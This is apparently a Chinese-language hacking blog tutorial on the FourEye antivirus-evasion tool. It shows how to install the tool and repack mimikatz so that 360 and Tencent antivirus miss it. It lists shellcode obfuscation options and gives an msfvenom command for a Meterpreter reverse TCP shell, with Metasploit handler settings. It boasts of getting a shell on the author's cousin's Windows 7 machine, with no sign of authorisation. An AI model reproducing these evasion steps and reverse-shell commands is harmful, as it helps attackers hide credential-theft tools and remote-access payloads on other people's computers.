本文将为你推荐一款比较优秀的免杀工具,安装简单,免杀效果还行。他就是FourEye,本文一起来看看吧。

安装与环境

测试环境

  • kali2022
  • win7 (64)

安装依赖

安装mingw-w64,如果不安装,则不能正常生成相关shell,安装也很简单,执行下面命令即可。

apt-get install mingw-w64

下载项目与安装

git clone https://github.com/lengjibo/FourEye.git
cd FourEye
pip install -r requirements.txt
python3 BypassFramework.py

如果顺利的话,安装成功后效果如下:

牛刀小试

这里我们用mimikatz.exe测试,先从github上面下载该工具。一般情况该工具会被安全工具直接删掉。
打开脚本后,选择EXE类型,将mimikatz的绝对路径写入,回车后稍等一会,会在/root目录下生成一个重新命名的mimikatz


免杀效果


看起来还不错,国内的主流360和腾讯都是免杀的。

基于shellcode的免杀

运行命令后,输入shellcode


输入list可见所有的payload

选择免杀方式

  • 1:Fiber、
  • 2:APC、
  • 3:图片分离,

选择加密方式

xor或者rot13
选择位数,x64或者x86

生成shell execute

对msfconsole免杀

我们在玩msf时,生成的shell是最基本的shell,很容易被查杀,利用此工具可以完美解决此问题。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.123.23 LPORT=7788 -f raw -o shell.raw

配置msf

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.123.23
set lport 444
exploit

上线效果

360查杀

总结

这款工具相对来说安装和使用比较简单,免杀效果也较好。但是不知道是什么原因win10系统不能得到反弹,只能在表妹的win764位机上面成功得到了shell。

Kali黑客笔记一键关注
Last modification:September 18, 2022
正在沿街乞讨中……